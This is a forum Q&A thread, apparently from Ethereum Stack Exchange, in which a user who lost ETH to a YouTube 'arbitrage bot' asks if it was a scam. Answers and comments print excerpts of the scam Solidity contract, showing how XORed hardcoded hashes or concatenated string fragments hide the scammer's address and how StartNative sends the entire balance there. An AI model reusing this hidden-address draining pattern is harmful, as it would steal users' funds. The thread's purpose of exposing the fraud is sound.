1

Somehow, I got into this YouTube video, naturally believed it, and followed the directions. https://www.youtube.com/watch?v=dK6U9P9pt6A&ab_channel=JazzBraze

After deploying this bot, I confirmed a 0.1246ETH (the video suggested 0.5ETH min but I did not had this amount on my MetaMask) transfer to the generated smart contract. However, after clicking StartNative and reviewing the contract on Etherscan, I only see the zero value. Study thoroughly - was I scammed? Is there a method to retrieve those funds?

This is the link of this contract:

https://etherscan.io/address/0xbb851c43574509677a1d17a974f8175ba44fb4c4

Please help!

Improve this question
5
  • 1
    Total scam, using words like mem pool and api, saying that it's scanning for transactions. Just rubbish that isn't possible to do from on chain. Don't copy paste things you don't understand, don't launch money with contracts you copy paste, or even feel you wrote, without testing the effects first. Remix warns against that scam when you paste in their console. Commented May 27, 2024 at 10:34
  • I got scammed too. I don`t know why I was so stupid to believe it. @Pavel: Maybe we should join forces and try to find out who scammed us. Hope there is a possibility to get our money back. I mean, we have the video, the youtube account, Telegram. Maybe there is a possibility to find to contact the police and find the person. Commented May 27, 2024 at 20:44
  • The girl they paid to make the video who's face is very clear, along with youtube account access info (location data address etc, if they slipped up), should give a lot more to go on than with most crypto scam cases. More than $100,000 at the scammers account, may be enough to get an investigation. Commented May 27, 2024 at 22:04
  • How come people don't see the girl was transferring in 1.8 ETH at "May-10-2024 12:44:47" and 1 ETH at "May-10-2024 12:46:23" from 0x414F7e5052e016e79BD405648FAb12257DcdD7Bb then transferred in 0.4816 ETH at "May-10-2024 12:47:47 AM UTC" and 0.7162 ETH at "May-10-2024 12:49:23" from 0x189f66abE571b4312f573c35C54dF70dBB39B9d7, then just withdrew 2.1978 ETH back to 0x414F7e5052e016e79BD405648FAb12257DcdD7Bb at "May-10-2024 12:50:47" all within 6 minutes without suspicion? It's not that hard to read etherscan right? etherscan.io/address/0xcc59705ab1b47f0b288ee250afe01bd4acfa8cf7 Commented Jan 14 at 0:11
  • Endless copies of this scam have been showing up on YouTube and YouTube moderation sucks! Here's another one: youtube.com/watch?v=SPLbTYUswbI Commented May 8 at 15:49

2 Answers 2

Reset to default
3

The scam:

  • Condenced:
 bytes32 DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc bytes32 factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed // Arbitrage search function for a native blockchain token function startArbitrageNative() internal { address tradeRouter = getDexRouter(DexRouter, factory); // < ---- Look here address dataProvider = getDexRouter(apiKey, apiSignature); IERC20(dataProvider).createStart(msg.sender, tradeRouter, address(0), address(this).balance); payable(tradeRouter).transfer(address(this).balance); // < ---- Look here } // ... function StartNative() public payable { startArbitrageNative(); }

getDexRouter returns the scammers address by xoring the hardcoded hashes

 // Function getDexRouter returns the DexRouter address function getDexRouter(bytes32 _DexRouterAddress, bytes32 _factory) internal pure returns (address) { return address(uint160(uint256(_DexRouterAddress) ^ uint256(_factory))); }

In python:

>>> DexRouter = 0xfdc54b1a6f53a21d375d0dea4b719169497dbac884f858c6cc4034ec1a5c51dc >>> factory = 0xfdc54b1a6f53a21d375d0deacc54b9f1d5309afc19f5eb0cca35296fc6da89ed >>> >>> w3.to_checksum_address(DexRouter ^ factory) '0x872528989c4D20349D0dB3Ca06751d83DC86D831'

source of ref

StartNative calls startArbitrageNative, which computes the address and makes the transfer:

 // Function for triggering an arbitration contract function StartNative() public payable { startArbitrageNative(); } //.. address tradeRouter = getDexRouter(DexRouter, factory); // payable(tradeRouter).transfer(address(this).balance); }

Easier ways to tell it's a scam:

Anything mentioning API is going to be total rubbish:

 apiKey = 0xfdc54b1a6f53a21d375d0dea444a27bd72abfff26c6fe5439842b42f4f5a01fc; apiSignature = 0xfdc54b1a6f53a21d375d0dea84608d84c088017f6661b90cbfa86d27732f6d3e; // Obtaining your own api key to connect to the arbitration data provider function Key() public view returns (uint256) { uint256 _balance = address(_owner).balance - arbTxPrice; return _balance; } }

Same with anything about Mempool, it isn't possible from on chain so you know it's a lie:

 // Mempool scanning function for interaction transactions with routers of selected DEX exchanges function mempool(address _router1, address _router2, address _token1, address _token2, uint256 _amount) internal view returns (uint256) { uint256 amtBack1 = getAmountOutMin(_router1, _token1, _token2, _amount); uint256 amtBack2 = getAmountOutMin(_router2, _token2, _token1, amtBack1); return amtBack2; }
Improve this answer
5
  • Thank you for your detailed response; it is unfortunate that I fell victim to this fraud. Unfortunately, I wasn't as astute to grasp it immediately away. Is there any way to reverse this and return the funds I sent to that address? I still have access to Remix and the scam bot... Commented May 27, 2024 at 19:27
  • Much love and I hope you make it all back. There isn't a way reverse it and there isn't any contract logic to try and exploit. It directly transfers the eth to an externally owned account (regular wallet address). So unless someone with the private key for that address signs a transaction transferring the eth out of the wallet no one can get it. Your only real hope is that they transfer eth to a centralised exchange with KYC and it's enough that the exchange would be willing to freeze the account and give it to police. It's very unlikely but does happen. Commented May 27, 2024 at 22:01
  • 1
    +1 from me: Great code reading skills! I was looking it up after seeing the same scam repackaged into another video. I'm definitely seeing 99 transactions on that XOR'ed address you mentioned with a transaction volume with the U.S. dollar equivalent around $769K with the last victim on 23 November 2024: etherscan.io/… Commented Jan 13 at 23:19
  • 1
    Now they don't just use XOR, but function startExploration() that combined strings from getMempoolShort() returns "0xFC4" fetchMempoolEdition() returns "8aBc" fetchMempoolVersion() returns "61DE85" getMempoolLong() returns "97312" getMempoolHeight() returns "7641d" getMempoolCode() returns "43F4f" getMempoolStart() returns "3970" getMempoolLog() returns "cbB329e6" : pastebin.com/raw/wj60Bgjc The result is payable(0xFC48aBc61DE85973127641d43F4f3970cbB329e6).transfer(address(this).balance); Commented Jan 14 at 0:32
  • I found another more recent variant from December 2024 - January 2025 that made $30K from the scam in 1 month: paste.ubuntu.com/p/4k4YXWy2rD This one XORs function getMempoolCode() private pure returns(bytes32) { return 0x78ec7412051d93ae41c764c97fb0539c309d7de084bcbe9bb730316b332d7be9; } and function getMempoolHeight() private pure returns(bytes32) { return 0x78ec7412051d93ae41c764c9848ffc814b022a40fce034bd0e8b5d0f623406c6; } to get 0xfb3faf1d7b9f57a0785c8a26b9bb6c6451197d2f: etherscan.io/address/… Commented Jan 18 at 23:08
2

A smart contract living on one chain can only access info that lives within this chain, so no mempool, no third party APIs, etc. So yes, based of the beginning of the video, this is a scam, and unfortunately there's no way to retrieve your funds, the contract you deployed basically forwards any ETH sent to it to the scammer.

Besides that, though, and way more trivial, no technical knowledge required, applying common sense (such as asking yourself "will someone i don't know really give me magic money-making code for free?") is a very good way of detecting scams.

Improve this answer
1
  • Yeah, also how come people don't see the girl was transferring in 1.8 ETH at "May-10-2024 12:44:47" and 1 ETH at "May-10-2024 12:46:23" from 0x414F7e5052e016e79BD405648FAb12257DcdD7Bb then transferred in 0.4816 ETH at "May-10-2024 12:47:47 AM UTC" and 0.7162 ETH at "May-10-2024 12:49:23" from 0x189f66abE571b4312f573c35C54dF70dBB39B9d7, then just withdrew 2.1978 ETH back to 0x414F7e5052e016e79BD405648FAb12257DcdD7Bb at "May-10-2024 12:50:47" all within 6 minutes without suspicion? It's not that hard to read etherscan right? etherscan.io/address/0xcc59705ab1b47f0b288ee250afe01bd4acfa8cf7 Commented Jan 14 at 0:11

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.